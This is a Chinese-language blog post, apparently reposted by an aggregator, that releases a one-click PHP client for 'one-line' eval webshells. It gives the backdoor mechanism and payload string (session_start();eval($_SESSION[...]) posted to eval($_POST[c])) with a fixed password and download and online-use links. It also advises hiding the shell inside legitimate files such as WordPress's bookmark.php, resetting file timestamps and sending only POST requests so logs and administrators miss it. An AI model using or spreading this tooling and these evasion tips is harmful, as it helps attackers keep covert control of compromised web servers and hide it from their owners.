前天通宵到后半夜的时候,总觉得自己最近都没干什么实事,觉得有点虚度的味道,心中不免有些自责。为了宽慰自己,决定做点正事。然后就啥都没干,坐着干想该做什么。一直想到快天亮,总算想出点东西来了(- -!),也就是现在发布的这个东西。
海洋顶端有个一键提交版的ASP一句话客户端,很方便,一次提交之后,一句话就可以当大马用了
。用这种客户端的话,留一句话的shell也就麻烦不到哪去了,而且把一句话藏在正常文件里面,再把时间改回正常,访问只用POST的话,基本是很难发现的。
但是PHP一句话一直没有见这样的客户端(不知道是不是我孤弱寡闻),网上居然还有转载的到处都是的工具,结果下载下来不能用.....
比较喜欢一句话的一键提交这种形式,所以花了2 x 半个通宵的时间做了这个东西,思路参考的是海洋,客户端的CSS也是修改它的,呵呵。
注意:
由于一键提交版的特殊性,暂时是不能随心所欲的换密码的,这个客户端的密码是字母c。(海洋的也是这样)。这个问题并不是不能解决,但是比较麻烦,所以还不如就用这密码呢,呵呵。
特点:
1.填好一句话WebShell地址和密码并点提交之后,后续操作不用再依赖客户端,基本上剩下的和操作大马没什么两样。
2.完全POST提交,避免了WebServer记录敏感数据。如果一句话插在有正常用户访问的PHP文件的话,插完时间也改回来了,那么管理员发现的概率就相当低了。(海洋的不是全POST)
大概原理:
一键提交版的一句话客户端连接成功之后,每次POST数据的时候, 假设一句话密码是c,都要先让本地表单:
c = session_start();eval($_SESSION[chr(120)]);
chr(120)就是字母c,为了避免单引号写成chr(120)形式。
然后一句话在eval($_POST[c])的时候,才能执行保存在Session中的我们的PHP代码。
想用其它密码的朋友可以依据这个原理修改。
下载:
http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client.rar
在线使用:
http://evilwares.appspot.com/static/eval.html
--------------------
才刚刚做出来,并没有做过多测试,如果有什么问题欢迎大家反馈(不过就怕我过了这份热度就对它也没兴趣了,呵呵。)
海洋是人家lcx好几年前的作品,我们现在还在探究人家早年就在用的技术,就像pjf的兵刃我上高中的时候就已经是流行度很高的利器了,到现在仍然有不少人在研究兵刃上面用到的各种牛X技术,唉,真是惭愧啊惭愧......
下面是测试截图:
1-A:单文件测试-代码
1-B:单文件测试-直接运行
1-C:单文件测试-客户端
1-D:单文件测试-连接一句话
1-E:单文件测试-登陆使用
2-A:插入正常文件测试-代码(这里我插的是我机器上WordPress的bookmark.php)
2-A:插入正常文件测试-连接
2-A:插入正常文件测试-登陆使用
此文章由 http://www.ositren.com 收集整理 ,地址为: http://www.ositren.com/htmls/1164.html